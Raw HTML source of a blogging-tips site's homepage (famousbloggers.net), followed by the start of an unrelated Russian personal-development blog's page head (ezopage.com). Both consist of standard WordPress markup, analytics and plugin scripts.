id='genesis-sample-fonts-css' href='//fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='http://famousbloggers.net/wp-content/plugins/wp-rich-snippets/lib/includes/extras/font-awesome/assets/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='http://famousbloggers.net/wp-content/plugins/jetpack/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[{\"path\":\"\\\/recommends\\\/\",\"label\":\"aff\"}]","home_url":"http:\/\/famousbloggers.net","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-includes/js/jquery/jquery-migrate.min.js'></script> <!--[if lt IE 9]> <script type='text/javascript' src='http://famousbloggers.net/wp-content/themes/genesis/lib/js/html5shiv.min.js'></script> <![endif]--> <link rel='https://api.w.org/' href='http://famousbloggers.net/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://famousbloggers.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://famousbloggers.net/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://wp.me/PG8kl-6tO' /> <link rel="alternate" type="application/json+oembed" href="http://famousbloggers.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ffamousbloggers.net%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://famousbloggers.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ffamousbloggers.net%2F&#038;format=xml" /> <!-- This site is optimized with the Schema plugin v1.7.5 - https://schema.press --> <script type="application/ld+json">{"@context":"http:\/\/schema.org","@type":"Organization","@id":"#organization","name":"Famous Bloggers","url":"http:\/\/famousbloggers.net\/","logo":"http:\/\/famousbloggers.net\/wp-content\/uploads\/2016\/06\/famousbloggers-logo-large.png","sameAs":["https:\/\/plus.google.com\/108327128521477426040","http:\/\/www.facebook.com\/famousbloggers","http:\/\/twitter.com\/famousbloggers"]}</script> <script type="application/ld+json"> { "@context": "http://schema.org", "@type": "WebSite", "@id": "#website", "name": "Famous Bloggers", "alternateName": "The Famous Blog", "url": "http://famousbloggers.net/", "potentialAction": { "@type": "SearchAction", "target": "http://famousbloggers.net/?s={search_term_string}", "query-input": "required name=search_term_string" } } </script> <style type='text/css'>img#wpstats{display:none}</style><link rel="icon" href="http://famousbloggers.net/wp-content/themes/genesis-fb/images/favicon.ico" /> <style type="text/css">.site-title a { background: url(http://famousbloggers.net/wp-content/uploads/2016/06/famousbloggers-logo.png) no-repeat !important; }</style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f7f7f7; } </style> </head> <body class="home page-template-default page page-id-24912 custom-background et_bloom custom-header header-image full-width-content"><div class="site-container"><ul class="genesis-skip-link"><li><a href="#genesis-nav-primary" class="screen-reader-shortcut"> Skip to primary navigation</a></li><li><a href="#genesis-content" class="screen-reader-shortcut"> Skip to content</a></li></ul><nav class="nav-primary" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement" id="genesis-nav-primary"><div class="wrap"><ul id="menu-top-nav" class="menu genesis-nav-menu menu-primary js-superfish"><li id="menu-item-35073" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-35073"><a href="http://famousbloggers.net/blog" itemprop="url"><span itemprop="name">The Famous Blog</span></a> <ul class="sub-menu"> <li id="menu-item-35074" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35074"><a href="http://famousbloggers.net/category/blogging-tips" itemprop="url"><span itemprop="name">Blogging</span></a></li> <li id="menu-item-35075" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35075"><a href="http://famousbloggers.net/category/social-media" itemprop="url"><span itemprop="name">Social Media</span></a></li> <li id="menu-item-35076" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35076"><a href="http://famousbloggers.net/category/seo" itemprop="url"><span itemprop="name">SEO</span></a></li> <li id="menu-item-35077" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35077"><a href="http://famousbloggers.net/category/marketing" itemprop="url"><span itemprop="name">Marketing</span></a></li> <li id="menu-item-35078" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35078"><a href="http://famousbloggers.net/category/web-design" itemprop="url"><span itemprop="name">Design</span></a></li> </ul> </li> </ul></div></nav><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><p class="site-title" itemprop="headline"><a href="http://famousbloggers.net/">Famous Bloggers</a></p><p class="site-description" itemprop="description">How To Blog and Start a Business</p></div><div class="widget-area header-widget-area"><section id="nav_menu-3" class="widget widget_nav_menu"><div class="widget-wrap"><nav class="nav-header" itemscope itemtype="https://schema.org/SiteNavigationElement"><ul id="menu-header-menu" class="menu genesis-nav-menu js-superfish"><li id="menu-item-24642" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24642"><a href="http://famousbloggers.net/submit-your-article" itemprop="url"><span itemprop="name">Contribute</span></a></li> <li id="menu-item-24641" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24641"><a href="http://famousbloggers.net/community-news" itemprop="url"><span itemprop="name">Submit News</span></a></li> <li id="menu-item-24644" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-24644"><a href="http://famousbloggers.net/about" itemprop="url"><span itemprop="name">About Us</span></a> <ul class="sub-menu"> <li id="menu-item-24645" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24645"><a href="http://famousbloggers.net/advertise" itemprop="url"><span itemprop="name">Advertise</span></a></li> <li id="menu-item-24646" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24646"><a href="http://famousbloggers.net/affiliates" itemprop="url"><span itemprop="name">Affiliates</span></a></li> <li id="menu-item-24649" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24649"><a href="http://famousbloggers.net/contests" itemprop="url"><span itemprop="name">Contests</span></a></li> <li id="menu-item-24651" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24651"><a href="http://famousbloggers.net/income-reports" itemprop="url"><span itemprop="name">Income Reports</span></a></li> <li id="menu-item-24650" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24650"><a href="http://famousbloggers.net/disclosure-policy" itemprop="url"><span itemprop="name">Disclosure Policy</span></a></li> </ul> </li> <li id="menu-item-24648" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24648"><a href="http://famousbloggers.net/contact-us" itemprop="url"><span itemprop="name">Contact Us</span></a></li> </ul></nav></div></section> </div></div></header><div class="home-top"><div class="home-top-content"><div class="wrap"><section id="text-20" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><h1>Welcome to the Famous Blog</h1> <h3>Build authority in your industry through blogging.</h3> <p>The list of benefits of Guest Blogging is virtually endless,<br>Join us on this exciting journey. <br><strong>Write for us to get noticed by others</strong></p> <p><a href="http://famousbloggers.net/submit-your-article" class="button button-cta">Signup for Free</a></p> </div> </div></section> </div></div></div><div class="home-featured"><div class="wrap"><div class="one-third first"><div class="content home-middle-widget one"><section id="featured-post-10" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">Blogging</h4> <article class="post-41444 post type-post status-publish format-standard has-post-thumbnail category-news category-seo category-wordpress tag-plugins tag-schema tag-schema-mrkup tag-schema-org tag-seo-plugins entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/d1a4bb6ce32d5fb6cc5f2f77b252440b?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/d1a4bb6ce32d5fb6cc5f2f77b252440b?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/schema-premium-plugin.html">Schema Premium plugin has been released</a></h4></header></article><article class="post-40984 post type-post status-publish format-standard has-post-thumbnail category-blogging-tips-blogging-tips-2 tag-blogging-tips tag-make-money-online entry"><span class="alignleft"><img alt='' src='http://2.gravatar.com/avatar/ea1dee875ba753b2e81fb50d8cc86d29?s=45&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/ea1dee875ba753b2e81fb50d8cc86d29?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/blogging-beliefs-money.html">5 Blogging Limiting Beliefs about Money that You Need to Release</a></h4></header></article><article class="post-40664 post type-post status-publish format-standard has-post-thumbnail category-wordpress tag-black-friday tag-cyber-monday tag-wordpress-deals tag-wordpress-discounts tag-wordpress-hosting tag-wordpress-offers tag-wordpress-plugins tag-wordpress-themes entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/d1a4bb6ce32d5fb6cc5f2f77b252440b?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/d1a4bb6ce32d5fb6cc5f2f77b252440b?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/get-wordpress-black-friday-cyber-monday-deals.html">Get WordPress Black Friday &#038; Cyber Monday Deals</a></h4></header></article><article class="post-40530 post type-post status-publish format-standard has-post-thumbnail category-blogging-tips-blogging-tips-2 tag-blog-profit tag-blogging-tips tag-blogs tag-earn-money tag-make-money tag-make-money-online entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/4b83fd29ca90297b9c4f0558cdf2b346?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/4b83fd29ca90297b9c4f0558cdf2b346?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/blog-making-money.html">What is Keeping Your Blog from Making Money?</a></h4></header></article><article class="post-40234 post type-post status-publish format-standard has-post-thumbnail category-blogging-tips tag-actionable-content tag-blog tag-blogger tag-blogging-tips tag-blogs tag-building-content tag-content-creation tag-content-writing tag-engage-readers entry"><span class="alignleft"><img alt='' src='http://0.gravatar.com/avatar/f3772984de2c3677f52ec0b107012c18?s=45&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/f3772984de2c3677f52ec0b107012c18?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/engage-readers.html">10 Techniques how to Start a Blog Post to Engage Readers to Stay on Page</a></h4></header></article></div></section> </div></div><div class="one-third"><div class="content home-middle-widget two"><section id="featured-post-3" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">Social Media</h4> <article class="post-40399 post type-post status-publish format-standard has-post-thumbnail category-social-media tag-professional-social-media tag-social-media tag-social-media-marketing tag-social-media-services entry"><span class="alignleft"><img alt='' src='http://0.gravatar.com/avatar/605946fffbbdefd6ef3a92da4b135834?s=45&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/605946fffbbdefd6ef3a92da4b135834?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/professional-social-media-services-businesses.html">Importance Of Professional Social Media Services For Businesses</a></h4></header></article><article class="post-40366 post type-post status-publish format-standard has-post-thumbnail category-social-media tag-business tag-feedback tag-sales tag-social-media tag-trends entry"><span class="alignleft"><img alt='' src='http://2.gravatar.com/avatar/28dafdb671198e241c03e63ecfdec3bc?s=45&#038;d=mm&#038;r=g' srcset='http://2.gravatar.com/avatar/28dafdb671198e241c03e63ecfdec3bc?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/social-media-sales-smart-business.html">Social Media Makes Sales Enablement Easy By Showing How Smart Business Can Be</a></h4></header></article><article class="post-39873 post type-post status-publish format-standard has-post-thumbnail category-social-media category-twitter-social-media tag-applications tag-history tag-social-media tag-technology tag-tweet tag-twitter entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/a51cd4103ad0d6223c463e06ec5f1048?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/a51cd4103ad0d6223c463e06ec5f1048?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/tweet-or-not.html">To Tweet or Not To Tweet!</a></h4></header></article><article class="post-35397 post type-post status-publish format-standard has-post-thumbnail category-social-media tag-facebook tag-mind-police tag-social tag-social-media entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/7c4e797389b34ff3d4e90b3a3cd1f94f?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/7c4e797389b34ff3d4e90b3a3cd1f94f?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/movement-take-out-social-sites.html">Is There a Movement to Take ‘Social’ out of Social Sites? For Some There Is!</a></h4></header></article><article class="post-35388 post type-post status-publish format-standard has-post-thumbnail category-social-media tag-facebook tag-follow-friday tag-followers tag-informational tag-social-media tag-twitter entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/184dd11ba13520af510f81c736c6e5a1?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/184dd11ba13520af510f81c736c6e5a1?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/cease-social-media.html">10 Things You Need to Cease Doing on Social Media</a></h4></header></article></div></section> </div></div><div class="one-third"><div class="content home-middle-widget three"><section id="featured-post-6" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">SEO</h4> <article class="post-40599 post type-post status-publish format-standard has-post-thumbnail category-infographic-web-design category-seo tag-infographic tag-seo tag-seo-infographic tag-social-content tag-social-media entry"><span class="alignleft"><img alt='' src='http://0.gravatar.com/avatar/02ffb2136ecfdceba4e9e829734a5c7b?s=45&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/02ffb2136ecfdceba4e9e829734a5c7b?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/seo-trend-infographic.html">SEO is Evolving: Trend You Need to Know About [Infographic]</a></h4></header></article><article class="post-40459 post type-post status-publish format-standard has-post-thumbnail category-seo tag-case-study tag-google tag-google-search tag-google-search-results tag-ranking tag-schema-mrkup tag-schema-org tag-search-engine tag-search-ranking tag-webpage-ranking entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/d1a4bb6ce32d5fb6cc5f2f77b252440b?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/d1a4bb6ce32d5fb6cc5f2f77b252440b?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/schema-org-markup-ranking-google-search.html">Does schema.org Markup Really Improve Google Search Ranking Position?</a></h4></header></article><article class="post-40193 post type-post status-publish format-standard has-post-thumbnail category-seo tag-content tag-content-promotion tag-marketing-campaign tag-organic-searchers tag-search-engine-portals tag-search-engines tag-seo tag-seo-services tag-web-traffic entry"><span class="alignleft"><img alt='' src='http://1.gravatar.com/avatar/12d7b453639c31ebe9a2f8298f110478?s=45&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/12d7b453639c31ebe9a2f8298f110478?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/seo-services-helps-increase-traffic.html">How SEO Services Can Help Increase Your Website Traffic</a></h4></header></article><article class="post-40211 post type-post status-publish format-standard has-post-thumbnail category-seo tag-domain tag-indexing tag-optimization tag-seo entry"><span class="alignleft"><img alt='' src='http://0.gravatar.com/avatar/f7d9f76ffa83cf15144ac38c89eaa786?s=45&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/f7d9f76ffa83cf15144ac38c89eaa786?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/seo-newbies-guide.html">The Impatient Newbie’s Guide to SEO</a></h4></header></article><article class="post-39964 post type-post status-publish format-standard has-post-thumbnail category-seo tag-business tag-google tag-local-businesses tag-local-seo-2 tag-marketing tag-mobile tag-seo tag-seo-strategies tag-seo-trends entry"><span class="alignleft"><img alt='' src='http://0.gravatar.com/avatar/9d52b9f4bbd1aac3f6b444f77ae9bbee?s=45&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/9d52b9f4bbd1aac3f6b444f77ae9bbee?s=90&#038;d=mm&#038;r=g 2x' class='avatar avatar-45 photo' height='45' width='45' /></span><header class="entry-header"><h4 class="entry-title"><a href="http://famousbloggers.net/local-seo-trends-boost-website.html">Learn the Top 5 Local SEO Trends That Can Boost Your Website in 2016</a></h4></header></article></div></section> </div></div></div></div><div class="site-inner"><div class="content-sidebar-wrap"><main class="content" id="genesis-content"></main></div></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><p><div class="creds">Copyright &copy;2019 &middot; <a href="http://famousbloggers.com/">FamousBloggers</a> - All Rights Are Reserved &middot; Powered by <a href="http://www.shareasale.com/r.cfm?B=242694&U=416358&M=28169&urllink=" rel="nofollow">Genesis Framework</a></div></p></div></footer></div><link crossorigin="anonymous" rel='stylesheet' id='et-gf-open-sans-css' href='http://fonts.googleapis.com/css?family=Open+Sans:400,700' type='text/css' media='all' /> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var mashsb = {"shares":"104","round_shares":"","animate_shares":"0","dynamic_buttons":"0","share_url":"http:\/\/famousbloggers.net\/","title":"Famous+Bloggers","image":null,"desc":"","hashtag":"FamousBloggers","subscribe":"content","subscribe_url":"","activestatus":"1","singular":"1","twitter_popup":"1","refresh":"0","nonce":"88cfd0d35f","postid":"24912","servertime":"1557987178","ajaxurl":"http:\/\/famousbloggers.net\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/plugins/mashsharer/assets/js/mashsb.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var thirsty_global_vars = {"home_url":"\/\/famousbloggers.net","ajax_url":"http:\/\/famousbloggers.net\/wp-admin\/admin-ajax.php","link_fixer_enabled":"yes","link_prefix":"go","link_prefixes":{"3":"recommends","5":"go"},"post_id":"24912","enable_record_stats":"yes","enable_js_redirect":"yes","disable_thirstylink_class":""}; /* ]]> */ </script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/plugins/thirstyaffiliates/js/app/ta.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-includes/js/comment-reply.min.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-includes/js/hoverIntent.min.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/themes/genesis/lib/js/menu/superfish.min.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/themes/genesis/lib/js/skip-links.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var genesisSampleL10n = {"mainMenu":"Menu","subMenu":"Menu"}; /* ]]> */ </script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/themes/genesis-fb/js/responsive-menu.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var q2w3_sidebar_options = [{"sidebar":"sidebar","margin_top":120,"margin_bottom":0,"stop_id":"","screen_max_width":0,"screen_max_height":0,"width_inherit":false,"refresh_interval":1500,"window_load_hook":false,"disable_mo_api":false,"widgets":["text-21"]}]; /* ]]> */ </script> <script type='text/javascript' src='http://famousbloggers.net/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js'></script> <script type='text/javascript' src='http://famousbloggers.net/wp-includes/js/wp-embed.min.js'></script> <!-- This site is optimized with the WP Rich Snippets version 1.4.8 by https://wprichsnippets.com --> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.1.1',blog:'10041789',post:'24912',tz:'-5',srv:'famousbloggers.net'} ]); _stq.push([ 'clickTrackerInit', '10041789', '24912' ]); </script> </body></html>
0
<!DOCTYPE html> <html lang="ru-RU" prefix="og: http://ogp.me/ns#" > <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-6743164432028687", enable_page_level_ads: true }); </script> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href=""> <title>Дневник Познания</title> <!-- All in One SEO Pack 2.12.1 by Michael Torbert of Semper Fi Web Design[521,572] --> <meta name="description" content="Личностное развитие современного человека. Вдохновение, мотивация, практические советы и личный опыт." /> <script type="application/ld+json"> { "@context": "http://schema.org", "@type": "WebSite", "potentialAction": { "@type": "SearchAction", "target": "https://ezopage.com/?s={search_term}", "query-input": "required name=search_term" }, "url": "https://ezopage.com/" } </script> <link rel='next' href='https://ezopage.com/page/2/' /> <link rel="canonical" href="https://ezopage.com/" /> <meta property="og:title" content="Дневник Познания" /> <meta property="og:type" content="website" /> <meta property="og:url" content="https://ezopage.com/" /> <meta property="og:image" content="http://ezopage.com/wp-content/uploads/2018/12/dp.png" /> <meta property="og:site_name" content="Дневник познания - территория развития" /> <meta property="og:description" content="Личностное развитие современного человека. Вдохновение, мотивация, практические советы и личный опыт." /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@ezopage" /> <meta name="twitter:domain" content="Дневник Познания" /> <meta name="twitter:title" content="Дневник Познания" /> <meta name="twitter:description" content="Личностное развитие современного человека. Вдохновение, мотивация, практические советы и личный опыт." /> <meta name="twitter:image" content="http://ezopage.com/wp-content/uploads/2018/12/dp.png" /> <meta itemprop="image" content="http://ezopage.com/wp-content/uploads/2018/12/dp.png" /> <script type="application/ld+json"> { "@context" : "http://schema.org", "@type" : "Organization", "name" : "", "url" : "https://ezopage.com", "sameAs" : ["https://www.facebook.com/ezopage/","https://twitter.com/ezopage","https://plus.google.com/u/0/+Ezopage1"] } </script> <script type="text/javascript" > window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-38376095-1', 'auto'); // Plugins ga('send', 'pageview'); </script> <script async src="https://www.google-analytics.com/analytics.js"></script> <!-- /all in one seo pack --> <link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Дневник Познания &raquo; Лента" href="https://ezopage.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Дневник Познания &raquo; Лента комментариев" href="https://ezopage.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/ezopage.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://ezopage.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://ezopage.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='widgetopts-styles-css' href='http://ezopage.com/wp-content/plugins/widget-options/assets/css/widget-options.css' type='text/css' media='all' /> <link rel='stylesheet' id='smr-fonts-css' href='https://fonts.googleapis.com/css?family=PT+Sans+Narrow%3A400%2C700%7CPT+Serif%3A400%2C700%2C400italic&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='smr-bootstrap-css' href='http://ezopage.com/wp-content/themes/shamrock/css/bootstrap/bootstrap.min.css?ver=1.1' type='text/css' media='screen, print' /> <link rel='stylesheet' id='smr-fontawesome-css' href='http://ezopage.com/wp-content/themes/shamrock/css/fontawesome/css/font-awesome.min.css?ver=1.1' type='text/css' media='screen, print' /> <link rel='stylesheet' id='smr-style-css' href='http://ezopage.com/wp-content/themes/shamrock/style.css?ver=1.1' type='text/css' media='screen, print' /> <style id='smr-style-inline-css' type='text/css'> body,.main-navigation ul ul {background: #ffffff;}a{color: #d34836;}.site-navigation-wrapper{border-top: 1px solid rgba(153,153,153,0.3);border-bottom: 1px solid rgba(153,153,153,0.3);}.entry-content a:not(.more-link):not(.wp-block-button__link){color: #333333;background: -webkit-gradient(linear, 50% 100%, 50% 0%, color-stop(50%, #ffffff), color-stop(50%, #d34836));background: -moz-linear-gradient(bottom, #ffffff 50%, #d34836 50%);background: -webkit-linear-gradient(bottom, #ffffff 50%, #d34836 50%);background: linear-gradient(to top, #ffffff 50%, #d34836 50%);background-repeat: repeat-x;background-size: 2px 2px;background-position: 0 100%;text-shadow: 2px 0 #ffffff, 0px 2px #ffffff, -2px 0 #ffffff, 0 -2px #ffffff;}body,.site-header .site-title a,.smr-nofimg .smr-post.has-post-thumbnail .entry-title a,.smr-nofimg .smr-post.has-post-thumbnail .entry-header .entry-title,.sidebar a,.archive-head p,.smr-prev-next a,.smr-nav-search button.smr-search-submit,.sidebar .smr-search-form .smr-search-submit{color: #333333;}.has-post-thumbnail .entry-meta .meta-item, .has-post-thumbnail .entry-meta span, .has-post-thumbnail .entry-meta a{color: rgba(255,255,255,0.7);}.has-post-thumbnail .entry-meta a:hover{color: #FFF;}.main-navigation li:after{background: #d34836;}.smr-pagination a,.entry-meta a:hover,.sidebar a:hover,.sidebar li:before,.entry-content a:hover,.entry-title a:hover,.comment-list .comment-reply-link,.smr-author-box .smr-author-link,.sub-menu li:hover > a,.smr-nofimg .smr-post.has-post-thumbnail .entry-title a:hover,.smr-nofimg .has-post-thumbnail .entry-meta a:hover,.smr-post.format-video .entry-header .entry-title a:hover,.smr-post.format-gallery .entry-header .entry-title a:hover,.smr-post.format-audio .entry-header .entry-title a:hover,.smr-post.format-image .entry-header .entry-title a:hover,.smr-post.format-video .entry-header .entry-meta a:hover,.smr-post.format-audio .entry-header .entry-meta a:hover,.smr-post.format-gallery .entry-header .entry-meta a:hover,.smr-post.format-image .entry-header .entry-meta a:hover,.sidebar .tagcloud a:hover,.entry-footer .meta-tags a:hover,.smr-prev-next a:hover,.site-footer a:hover{color: 